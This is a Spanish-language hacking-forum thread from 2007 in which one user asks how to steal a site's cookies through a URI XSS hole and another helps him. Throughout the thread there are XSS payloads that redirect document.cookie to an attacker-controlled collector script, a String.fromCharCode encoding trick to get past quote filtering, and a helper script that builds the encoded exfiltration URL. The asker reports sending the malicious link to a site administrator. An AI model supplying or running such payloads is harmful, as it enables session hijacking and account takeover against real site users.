elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [?] Duda XSS		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [?] Duda XSS  (Leído 3,679 veces)
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
[?] Duda XSS
« en: 29 Septiembre 2007, 12:51 pm »
me borraron el anterior post donde pregunté esto.. fui a mirar las normas y lo único que incumplía era el no haber puesto el tag de duda "[?]" en el título así que vuelvo a preguntar:

en una web vulnerable de esta forma, "XSS in URI":

http://www.web.com/index.php/>"><script>alert(document.cookie)</script>

de esa manera aparece un alert diciendo la cookie
entonces, es vulnerable pero si pongo un alert diciendo hola por ejemplo, no funciona

http://www.web.com/index.php/>"><script>alert('hola')</script>

entonces,
 si intento robar la cookie de esta manera:

http://www.web.com/index.php/>"><script>window.location='http://miweb.com/gcookie.php?c='+document.cookie;</script>


No funciona, no se guarda la cookie ni sucede nada.

entonces , ésto porqué es ? ... y cómo puedo hacer para poder robar la cookie..
gracias.
« Última modificación: 29 Septiembre 2007, 14:10 pm por GreenDeviL » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] Duda XSS
« Respuesta #1 en: 29 Septiembre 2007, 14:29 pm »
Examina el código fuente de la página Web una vez inyectado el código para verificar que éste sea correcto. Aunque en tu caso supongo que será por que las comillas simples se encuentran filtradas, y bien desaparecen cuando se inyectan, o una contra barra pasa a formar parte de la comillas simples para que ésta escape \'.

Prueba a utilizar comillas dobles a ver si sucede lo mismo, y si no, haz una inclusión del código JS a ejecutar:

Código
  1. <script src=http://miweb.com/script.js></script>

También puedes utilizar el método del objeto String, fromCharCode... He aquí un ejemplo:

Código
  1. <script>alert(String.fromCharCode(65,66,67))</script>
En línea
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: [?] Duda XSS
« Respuesta #2 en: 29 Septiembre 2007, 14:50 pm »
a ver, te comento:

Código:
>"><script>alert(String.fromCharCode(65,66,67))</script>

si , ésto sí funciona, sale el alert diciendo "ABC" o por ejemplo de esta manera;

Código:
http://www.web.com/index.php/>"><script>alert(String.fromCharCode(72,65,67,75,69,68))</script>
sale "hacked"

ok, pero entonces, cómo transformo todo esto:

Código:
>"><script>window.location='http://miweb.com/gcookie.php?c='+document.cookie;</script>

a String.fromCharCode ?

-

y otra pregunta, yo javascript no sé, qué línea de código era la que tenía que llevar el archivo "script.js" ?

porque lo he buscado buscando en tutoriales XSS pero nada
y no me acuerdo qué línea de código era la que hacía que se abriera el archivo y tal...


bueno, espero tu respuesta, gracias de nuevo !
« Última modificación: 29 Septiembre 2007, 17:04 pm por GreenDeviL » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] Duda XSS
« Respuesta #3 en: 30 Septiembre 2007, 02:40 am »
Debes transformar la cadena que se encuentra entre comillas simples a ASCII para usarla con el método que te mencioné...

Citar
>"><script>window.location=String.fromCharCode(X)+escape(document.cookie);</script>

Donde X ha de ir la página Web junto a la variable que recogerá la cookie, escrita carácter a carácter en ASCII, separado cada uno por una coma.

PD: La función escape se utiliza para escapar los saltos de línea, así evitaremos posibles perdidas por parte de la cookie.
En línea
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: [?] Duda XSS
« Respuesta #4 en: 30 Septiembre 2007, 13:06 pm »
ah yo transformaba todo , hasta lo de "window.location" xD
ahora probaré, gracias !
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: [?] Duda XSS
« Respuesta #5 en: 30 Septiembre 2007, 14:12 pm »
Quizás esto te pueda ayudar...

Código
  1. <script>
  2.  
  3. var url = "http://miweb.com/gcookie.php?c=";
  4.  
  5. function str2asc (str) {
  6. 	var temp = '';
  7. 	for (i=0;i<str.length;i++) {
  8. 		temp += str.charCodeAt(i);
  9. 		if (i!=str.length-1) { temp += ','; }
  10. 	}
  11.  
  12. 	return temp;
  13. }
  14.  
  15. document.write("window.location=String.fromCharCode("+str2asc(url)+")+escape(document.cookie);");
  16.  
  17. </script>
En línea
-sagitari-


Desconectado Desconectado

Mensajes: 1.643


:D


Ver Perfil WWW
Re: [?] Duda XSS
« Respuesta #6 en: 1 Octubre 2007, 14:47 pm »
si gracias ya hice todo
pero le pasé la   url maligna y parece que no he tenido suerte de que el admin no está logeado siempre con eso de "recordarme en este equipo"  .....
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines